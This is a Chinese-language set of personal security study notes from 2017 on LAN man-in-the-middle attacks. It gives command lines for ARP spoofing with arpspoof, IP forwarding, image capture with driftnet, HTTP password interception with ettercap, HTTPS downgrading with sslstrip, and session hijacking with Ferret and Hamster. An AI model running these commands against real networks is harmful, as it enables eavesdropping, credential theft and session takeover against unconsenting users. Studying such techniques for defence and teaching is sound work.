信息安全笔记（一）

整理人：LF

时间：2017-8-8

---

1、ARP攻击

ARP攻击就是通过伪造IP地址和MAC地址实现ARP欺骗，能够在网络中产生大量的ARP通信量使网络阻塞，攻击者只要持续不断的发出伪造的ARP响应包就能更改目标主机ARP缓存中的IP-MAC条目，造成网络中断或中间人攻击。

攻击者向电脑A发送一个伪造的ARP响应，告诉电脑A：电脑B的IP地址192.168.0.2对应的MAC地址是00-aa-00-62-c6-03，电脑A信以为真，将这个对应关系写入自己的ARP缓存表中，以后发送数据时，将本应该发往电脑B的数据发送给了攻击者。同样的，攻击者向电脑B也发送一个伪造的ARP响应，告诉电脑B：电脑A的IP地址192.168.0.1对应的MAC地址是00-aa-00-62-c6-03，电脑B也会将数据发送给攻击者。

至此攻击者就控制了电脑A和电脑B之间的流量，他可以选择被动地监测流量，获取密码和其他涉密信息，也可以伪造数据，改变电脑A和电脑B之间的通信内容。

---

A)ARP断网攻击

• [x] 操作环境：kali
• [x] 工具：Arpspoof
• [x] 参数：-i +网卡
• [x] -t +目标ip
• [x] 网管
  

  范例：

Arpspoof -i eth0 -t 192.168.1.104 192.168.1.1

结果：目标ip会出现断网现象，ping地址会出现请求超时

---

B)流量转发命令

流量转发命令：

echo "1" > /proc/sys/net/ipv4/ip_forward

出于安全考虑，Linux系统默认是禁止数据包转发的。所谓转发即当主机拥有多于一块的网卡时，其中一块收到数据包，根据数据包的目的ip地址将包发往本机另一网卡，该网卡根据路由表继续发送数据包。这通常就是路由器所要实现的功能。

配置Linux系统的ip转发功能，首先保证硬件连通，然后打开系统的转发功能

less /proc/sys/net/ipv4/ip_forward，该文件内容为0，表示禁止数据包转发，1表示允许，将其修改为1。

可使用命令echo “1”>/proc/sys/net/ipv4/ip_forward 修改文件内容，重启网络服务或主机后效果不再。

若要其自动执行，可将命令echo “1” > /proc/sys/net/ipv4/ip_forward 写入脚本/etc/rc.d/rc.local或者在/etc/sysconfig/network脚本中添加 FORWARD_IPV4=”YES”

内容摘自：http://blog.csdn.net/an_zhenwei/article/details/19152739

---

A+B=ARP欺骗攻击

首先进行流量转发:

Echo 1>/proc/sys/net/ipv4/ip_forward

再进行arp攻击:

Arpspoof -i 网卡 -t 目标ip 网关地址

结果：目标可以上网，成功欺骗

---

C)Driftnet获取图片

ARP欺骗后，通过driftnet来获取目标浏览的图片

代码：

Driftnet -i eth0

---

D)效果图

---

2、ettercap嗅探

Ettercap是一个非常强大的中间人攻击工具

详细参数介绍参考：
++http://xiao106347.blog.163.com/blog/static/21599207820146302851904/++

---

A)配合Arp欺骗截取http账户密码

Echo 1>/proc/sys/net/ipv4/ip_forward

Arpspoof -i 网卡 -t 目标ip 网关地址(前文提及，不作解释)

Ettercap -Tq -i eth0

参数解释：
- [x] -T 启动
- [x] -q 安静模式
- [x] -i 网卡

==结果：目标IP登陆http网页输入账户密码时会进行截取==

---

B)sslstrip还原https链接

命令

Sslstrip -a -f -k

---

3、会话劫持

• Arpspoof
• Wiresharp 抓包
• Ferret -i eth0
• Hamster (注意浏览器使用代理一致)